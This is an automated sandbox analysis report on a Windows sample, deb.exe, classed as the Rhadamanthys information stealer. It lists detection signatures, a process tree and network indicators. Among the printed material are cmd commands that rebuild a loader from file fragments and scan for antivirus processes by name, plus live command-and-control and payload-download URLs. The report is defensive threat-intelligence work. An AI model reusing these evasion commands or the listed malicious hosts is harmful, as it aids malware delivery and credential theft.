Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
deb.exe

Overview

General Information

Sample name:deb.exe
Analysis ID:1578118
MD5:176033d9407c87db1083366f6cc0667d
SHA1:74b24121584544e7450541885078b56c7fe7a8a5
SHA256:1676766aa84245f0c139b5c38772af13b24a16140c7e552fee00c21784952ad2
Tags:exesolus-todayuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Drops PE files with a suspicious file extension
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Uncommon Svchost Parent Process
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • deb.exe (PID: 1880 cmdline: "C:\Users\user\Desktop\deb.exe" MD5: 176033D9407C87DB1083366F6CC0667D)
    • conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • downloaded_exe.exe (PID: 2244 cmdline: "C:\Users\user\AppData\Local\Temp\downloaded_exe.exe" MD5: 22AEFDCE6474D0687748AB51F3DDE0D9)
      • cmd.exe (PID: 4176 cmdline: "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 2664 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 1924 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 5756 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 6568 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 6756 cmdline: cmd /c md 542181 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • findstr.exe (PID: 4976 cmdline: findstr /V "exports" Fleece MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 5256 cmdline: cmd /c copy /b ..\Stewart + ..\Universe + ..\Ferry + ..\Namely + ..\Catholic + ..\Understanding + ..\Invalid + ..\Del + ..\Premier b MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Flux.com (PID: 1916 cmdline: Flux.com b MD5: 62D09F076E6E0240548C2F837536A46A)
          • svchost.exe (PID: 6812 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • fontdrvhost.exe (PID: 4196 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
              • WerFault.exe (PID: 2976 cmdline: C:\Windows\system32\WerFault.exe -u -p 4196 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
          • WerFault.exe (PID: 3924 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 972 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • choice.exe (PID: 612 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000003.2542694593.00000000029C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000012.00000003.2546815827.0000000005060000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000012.00000002.2631620318.0000000002ED0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        00000012.00000003.2546587456.0000000004E40000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          Process Memory Space: svchost.exe PID: 6812JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            18.3.svchost.exe.5060000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              18.3.svchost.exe.4e40000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                Sigma Signatures

                Sigma detected: Suspicious Copy From or To System Directory
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\downloaded_exe.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe, ParentProcessId: 2244, ParentProcessName: downloaded_exe.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd, ProcessId: 4176, ProcessName: cmd.exe
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: Flux.com b, ParentImage: C:\Users\user\AppData\Local\Temp\542181\Flux.com, ParentProcessId: 1916, ParentProcessName: Flux.com, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6812, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: Flux.com b, ParentImage: C:\Users\user\AppData\Local\Temp\542181\Flux.com, ParentProcessId: 1916, ParentProcessName: Flux.com, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6812, ProcessName: svchost.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Sigma detected: Search for Antivirus process
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4176, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6568, ProcessName: findstr.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T09:29:50.727336+010028548021Domain Observed Used for C2 Detected5.35.36.1207957192.168.2.649792TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5xAvira URL Cloud: Label: malware
                Source: https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5kernelbasentdllkernel32GetProcessMitigatioAvira URL Cloud: Label: malware
                Source: https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5Avira URL Cloud: Label: malware
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeReversingLabs: Detection: 25%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020216C5 CryptStringToBinaryA,CryptStringToBinaryA,0_2_00007FF7020216C5
                Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.6:49710 version: TLS 1.2
                Source: deb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: wkernel32.pdb source: svchost.exe, 00000012.00000003.2546257453.0000000004F60000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2546001305.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000012.00000003.2546815827.0000000005060000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2546587456.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ntdll.pdb source: svchost.exe, 00000012.00000003.2544333364.0000000005030000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2544063531.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000012.00000003.2545512120.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2545155192.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ntdll.pdbUGP source: svchost.exe, 00000012.00000003.2544333364.0000000005030000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2544063531.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: svchost.exe, 00000012.00000003.2545512120.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2545155192.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdbUGP source: svchost.exe, 00000012.00000003.2546815827.0000000005060000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2546587456.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdbUGP source: svchost.exe, 00000012.00000003.2546257453.0000000004F60000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2546001305.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: 4_2_00406301 FindFirstFileW,FindClose,4_2_00406301
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: 4_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00406CC7
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\542181Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\542181\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then push r150_2_00007FF702055360
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then mov eax, dword ptr [rcx]0_2_00007FF702035500
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then push rsi0_2_00007FF7020661B0
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then push rsi0_2_00007FF7020E0200
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then push r150_2_00007FF70206A220
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then push rbp0_2_00007FF7020B6240
                Source: C:\Users\user\Desktop\deb.exeCode function: 5x nop then mov r9d, r8d0_2_00007FF7020A1760
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then push rdi0_2_00007FF702069790
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then push rbp0_2_00007FF702069790
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then push rdi0_2_00007FF702069790
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then push rbp0_2_00007FF702069790
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then mov rax, rcx0_2_00007FF70204B580
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then push rbx0_2_00007FF7020E15D0
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then mov eax, dword ptr [rcx+10h]0_2_00007FF70204A5C0
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF7020D5B90
                Source: C:\Users\user\Desktop\deb.exeCode function: 5x nop then push r150_2_00007FF7020E3BA0
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then push r130_2_00007FF702069C00
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then push rsi0_2_00007FF702067920
                Source: C:\Users\user\Desktop\deb.exeCode function: 5x nop then lea edx, dword ptr [r9+r9*4]0_2_00007FF702030950
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then mov r8d, dword ptr [rax+r9]0_2_00007FF702032980
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then mov eax, dword ptr [rsi]0_2_00007FF7020389D0
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then push rsi0_2_00007FF7020529F0
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then push rsi0_2_00007FF702084AF0
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then mov rax, qword ptr [rcx+10h]0_2_00007FF7020460F9
                Source: C:\Users\user\Desktop\deb.exeCode function: 5x nop then xor eax, eax0_2_00007FF702037100
                Source: C:\Users\user\Desktop\deb.exeCode function: 4x nop then mov r8d, dword ptr [rdx+04h]0_2_00007FF702037E40
                Source: C:\Users\user\Desktop\deb.exeCode function: 5x nop then mov rax, rcx0_2_00007FF702040E80
                Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp22_2_000001479FB30511

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 5.35.36.120:7957 -> 192.168.2.6:49792
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.35.36.120 7957Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.6:49792 -> 5.35.36.120:7957
                Source: Joe Sandbox ViewASN Name: INF-NET-ASRU INF-NET-ASRU
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: unknownTCP traffic detected without corresponding DNS query: 5.35.36.120
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702021460 InternetOpenA,InternetOpenA,InternetOpenUrlA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF702021460
                Source: global trafficHTTP traffic detected: GET /salah/wp-includes/assets/ping.php HTTP/1.1User-Agent: EXEFetcherHost: ebitm.co.ukCache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: ebitm.co.uk
                Source: global trafficDNS traffic detected: DNS query: dVxTXNLGomMFsmfMnuD.dVxTXNLGomMFsmfMnuD
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: Flux.com.5.dr, Billion.4.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: Flux.com.5.dr, Billion.4.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: downloaded_exe.exe, 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmp, Flux.com.5.dr, Billion.4.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Flux.com.5.dr, Billion.4.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: downloaded_exe.exe, 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmp, Flux.com.5.dr, Billion.4.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: downloaded_exe.exe, 00000004.00000000.2260239937.0000000000409000.00000002.00000001.01000000.00000006.sdmp, downloaded_exe.exe, 00000004.00000002.2276313761.0000000000409000.00000002.00000001.01000000.00000006.sdmp, downloaded_exe.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://ocsp.digicert.com0L
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://ocsp.digicert.com0N
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://ocsp.digicert.com0O
                Source: Flux.com.5.dr, Billion.4.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: Flux.com.5.dr, Billion.4.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: downloaded_exe.exe, 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmp, Flux.com.5.dr, Billion.4.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: downloaded_exe.exe, 00000004.00000002.2276341420.0000000000420000.00000004.00000001.01000000.00000006.sdmp, Flux.com.5.dr, Billion.4.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: Flux.com.5.dr, Billion.4.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: Flux.com.5.dr, Billion.4.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: Amcache.hve.24.drString found in binary or memory: http://upx.sf.net
                Source: Flux.com, 0000000E.00000000.2310521086.0000000000965000.00000002.00000001.01000000.00000008.sdmp, Fo.4.dr, Flux.com.5.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: downloaded_exe.exe.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                Source: svchost.exe, 00000012.00000002.2631500679.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2631091896.000000000089C000.00000004.00000010.00020000.00000000.sdmp, fontdrvhost.exe, fontdrvhost.exe, 00000016.00000002.2718992288.000001479FB30000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5
                Source: svchost.exe, 00000012.00000002.2631500679.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000016.00000002.2718992288.000001479FB30000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5kernelbasentdllkernel32GetProcessMitigatio
                Source: svchost.exe, 00000012.00000002.2631091896.000000000089C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5x
                Source: svchost.exe, 00000012.00000003.2563821039.0000000002D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                Source: svchost.exe, 00000012.00000003.2563821039.0000000002D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
                Source: deb.exe, 00000000.00000002.2267682167.0000025990A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ebitm.co.uk/d
                Source: deb.exeString found in binary or memory: https://ebitm.co.uk/salah/wp-includes/assets/ping.php
                Source: deb.exe, 00000000.00000002.2267682167.00000259909A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ebitm.co.uk/salah/wp-includes/assets/ping.php:N
                Source: deb.exeString found in binary or memory: https://ebitm.co.uk/salah/wp-includes/assets/ping.phpTEMP
                Source: deb.exe, 00000000.00000003.2255498764.0000025990A66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ebitm.co.uk/salah/wp-includes/assets/ping.phpY
                Source: deb.exe, 00000000.00000002.2267682167.0000025990A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ebitm.co.uk/t
                Source: deb.exeString found in binary or memory: https://gcc.gnu.org/bugs/):
                Source: Flux.com.5.dr, Billion.4.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: downloaded_exe.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: Billion.4.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.6:49710 version: TLS 1.2
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: 4_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_004050F9
